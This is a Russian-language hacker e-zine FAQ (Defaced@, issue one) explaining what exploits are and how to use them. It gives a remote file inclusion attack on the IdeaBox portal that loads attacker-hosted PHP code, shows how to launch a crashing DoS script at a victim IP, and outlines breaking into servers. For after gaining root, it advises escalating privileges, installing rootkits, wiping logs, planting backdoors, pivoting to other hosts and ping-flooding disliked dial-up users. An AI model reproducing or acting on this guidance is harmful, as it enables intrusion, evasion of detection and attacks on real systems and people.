#######################################
#!/usr/share/doc/defaced/1/faqs/faq.txt
#######################################
FAQ [ by euronymous ]
---
Поскольку это первый номер Defaced@, нам никто не присылал вопросы в FAQ.
Специально для этого, я попросил человека, известного в форуме kodsweb
по имени #Scripter#, прислать мне список интересующих его вопросов. Если у вас
есть вопрос, задайте его, написав на [email protected] с темой FAQ. Ответ на
него обязательно появится в следующем номере.
1. Что такое эксплоит?
2. Как пользоваться каким-либо эксплоитом?
3. Как поиметь шелл акаунт без ограничений?
4. Что делать когда ты рут?
1. Что такое эксплоит?
Эксплоит - это метод использования уязвимости в том или ином программном
обеспечении либо технологии. В последнее время термин "эксплоит" чаще всего
употребляют в отношении программной реализации такого метода, то есть,
грубо говоря, эксплоит - это программа, которая автоматизирует извлечение
какой-либо пользы из той или иной уязвимости.
2. Как пользоваться каким-либо эксплоитом?
Зависит во-первых от того, что это - пошаговая инструкция или программа. В
первом случае вы выполняете все условия, необходимые для успешного использования
уязвимости и, собственно, приступаете к задуманному. Пример:
- в портальной системе IdeaBox мной была обнаружена уязвимость, позволяющая
выполнить произвольный код на уязвимой системе.
Для этого мы регистрируем акаунт на любом бесплатном хостинге, предоставляющем
минимум возможностей [ как вариант, поднимаем самый простой веб-сервер на своей
машине ]. И закачиваем туда файл cord.php следующего содержания:
<?php system("id -P"); ?>
Теперь открываем браузер и пишем следующее:
http://victim/ideabox/include.php?ideaDir=http://your_site/
После выполнения этого сценария, вы увидите на своем экране примерно такую
строку:
www:*:30:1::/home/www:/sbin/sh
Есстественно, код сценария cord.php может быть любым.
Если эксплоит имеется в виде программы, то тут тоже может быть несколько
вариантов:
- если язык интерпретируемый [ Python, Perl, PHP, ASP, etc ], то достаточно
просто выполнить эту программу.
# python fWWhtdos.py SOME_VICTIM_IP
Вместо SOME_VICTIM_IP нужно вписать адрес IP жертвы. Эксплоит сделает свое дело
[ данный конкретный сплоит покрашит удаленный веб-сервер ].
- если программа написана на компилируемом языке [ чаще всего C ], то перед
использованием ее необходимо скомпилировать:
# gcc exploit.c
# ./a.out
Как правило при выполнении программы без параметров, она выведет информацию по
ее использованию. Кстати, преобразование исходника в объектный код можно
делать с заданием своего имени. Например:
# gcc -o exploit exploit.c
# ./exploit
Смотрим описание. Если это удаленный эксплоит, то обычно в качестве параметра
ему передается имя хоста или адрес IP. Если локальный, то параметров он либо
вообще не имеет, либо там необходимо указать смещение.
Советую перед компиляцией программы прочитать исходник на предмет того, для чего
она предназначена и как ей пользоваться. Бывает, что для успешного выполнения
эксплоита необходимо внести в исходный файл изменения [ например, последний
эксплоит для WebDAV требует, чтобы вы прописали свой адрес IP, на него будет
направляться оболочка с уязвимого хоста ] и лишь после этого компилировать.
3. Как поиметь шелл акаунт без ограничений?
Установить на своей машине какую-нибудь разновидность unix )).
Если же речь идет об удаленной машине, то как правило используется следующая
схема:
- сервер сканируется на известные уязвимости
- производится поиск эксплоитов к обнаруженным уязвимостям
- если обнаружен эксплоит, удаленно дающий root на атакуемой машине, то здесь
можно ставить точку.
- если таковых не имеется, но есть возможность получить оболочку с правами
непривилегированного пользователя, то дальше в ход идет исследование изнутри
- далее ищутся уязвимости, посредством которых локальный пользователь может
повысить свои привилегии до уровня root [ таких эксплоитов много. из последних
можно привести в пример эксплоит для проблемы ptrace_kmod ].
- устанавливается руткит, чистятся логи, etc.
4. Что делать когда ты рут?
Все зависит от того, кто этот заветный акаунт получил. Я лучше скажу, чего
однозначно не стоит делать:
- дефейсить веб-сайт [ если есть ]
- вешать туда всяких eggdrop, etc.
- удалять или модифицировать файлы других пользователей системы.
Первым делом необходимо скрыть следы своего присутствия, почистить логи,
установить бэкдоры для дальнейшего использования системы. А вот после этого
осмотреться, нет ли на сервере какой-либо полезной вам или кому-то еще
информации. Этот акаунт можно будет использовать для захвата других хостов, но
уже без риска быть пойманным. Также он может использоваться для
массированного прозвона [ ping ] неугодных вам человечков, которые сидят,
скажем, на диалапе.